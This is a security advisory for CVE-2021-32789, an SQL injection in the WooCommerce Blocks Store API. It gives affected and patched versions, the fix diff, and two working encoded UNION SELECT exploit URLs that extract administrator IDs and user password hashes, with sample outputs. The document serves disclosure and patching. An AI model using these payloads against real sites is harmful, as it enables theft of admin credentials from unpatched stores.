Skip to content
This repository was archived by the owner on Feb 23, 2024. It is now read-only.

Arbitrary SQL (SQL injection) possible via the Store API component.

Critical
nerrad published GHSA-6hq4-w6wv-8wrp Jul 23, 2021

Package

composer woocommerce/woocommerce-blocks (Composer)

Affected versions

>= 2.5.0

Patched versions

5.5.1, 5.4.1, 5.3.2, 5.2.1, 5.1.1, 5.0.1, 4.9.2, 4.8.1, 4.7.1, 4.6.1, 4.5.3, 4.4.3, 4.3.1, 4.2.1, 4.1.1, 4.0.1, 3.9.1, 3.8.1, 3.7.2, 3.6.1, 3.5.1, 3.4.1, 3.3.1, 3.2.1, 3.1.1, 3.0.1, 2.9.1, 2.8.1, 2.7.2, 2.6.2, 2.5.16

Description

Impact

This impacts all WooCommerce sites running 2.5.0 or later of the WooCommerce Blocks feature plugin. Via a carefully crafted URL, an exploit can be executed against the wc/store/products/collection-data?calculate_attribute_counts[][taxonomy] endpoint that allows the execution of a read only sql query.

  1. SQL formed to list the IDs of any admin based user.
/wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520SELECT%2525201%25252Cuser_id%252520FROM%252520wp_usermeta%252520WHERE%252520meta_value%252520LIKE%252520%252527%252525Administrator%252525%252527%25253b%252500
  1. User specific query to get the associated db fields including the hashed password
/wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252Cuser_login%25252C0x3a%25252Cuser_email%25252C0x3a%25252Cuser_pass%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500

Supporting Material/References:
Query 1 returns:

{“price_range”:null,”attribute_counts”:[{“term”:0,”count”:0},{“term”:1,”count”:1}],”rating_counts”:null}.

Query 2 returns:

 {“price_range”:null,”attribute_counts”:[{“term”:0,”count”:0},{“term”:”1:admin:**.com:$P$B.CZdnSLBmrCAURGHLO8pA2OoHdDoo0″,”count”:1}],”rating_counts”:null}

Patches

diff --git a/src/StoreApi/Utilities/ProductQueryFilters.php b/src/StoreApi/Utilities/ProductQueryFilters.php
index d8ebb765..bd3038ac 100644
--- a/src/StoreApi/Utilities/ProductQueryFilters.php
+++ b/src/StoreApi/Utilities/ProductQueryFilters.php
@@ -83,7 +83,13 @@ class ProductQueryFilters {
                        $attributes = array_map( 'wc_attribute_taxonomy_name_by_id', wp_parse_id_list( $attributes ) );
                }
   
-               $attributes_to_count     = array_map( 'wc_sanitize_taxonomy_name', $attributes );
+               $attributes_to_count     = array_map(
+                       function( $attribute ) {
+                               $attribute = wc_sanitize_taxonomy_name( $attribute );
+                               return esc_sql( $attribute );
+                       },
+                       $attributes
+               );
                $attributes_to_count_sql = 'AND term_taxonomy.taxonomy IN ("' . implode( '","', $attributes_to_count ) . '")';
                $attribute_count_sql     = "
                        SELECT COUNT( DISTINCT posts.ID ) as term_count, terms.term_id as term_count_id

Severity

Critical

CVE ID

CVE-2021-32789

Weaknesses

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Learn more on MITRE.